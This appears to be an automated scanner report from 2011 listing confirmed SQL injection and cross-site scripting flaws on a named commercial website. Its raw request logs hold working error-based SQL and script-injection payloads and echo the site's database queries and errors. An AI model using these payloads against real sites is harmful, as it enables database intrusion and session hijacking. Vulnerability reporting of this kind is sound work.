A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:48:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3901
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
Cross-site Scripting

Cross-site Scripting

5 TOTAL
IMPORTANT
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
nsextt GET '"--></style></script><script>alert(0x000002)</script>

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4622
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&nsextt='"--></style></script><script>netsparker(0x000002)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000002)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/hins00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000004)%3C/script%3E

/ppc/leadflow/hins00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000004)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
URI-BASED Raw URI '"--></style></script><script>alert(0x000004)</script>

Request

GET /ppc/leadflow/hins00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php'"--></style></script><script>netsparker(0x000004)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000004)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
Query Based QUERYSTRING '"--></style></script><script>alert(0x000006)</script>

Request

GET /ppc/leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2502
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?'"--></style></script><script>netsparker(0x000006)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000006)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x000007)</script>
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/hins00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000007)%3C/script%3E&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='"--></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000007)</script>&iusrc='+(select 1 and ro' at line 5
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='%3E%3Cscript%3Ealert(9)%3..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '><script>alert(9)</script>

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:41:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2430
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='><script>netsparker(9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/hins00/proj' at line 5
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

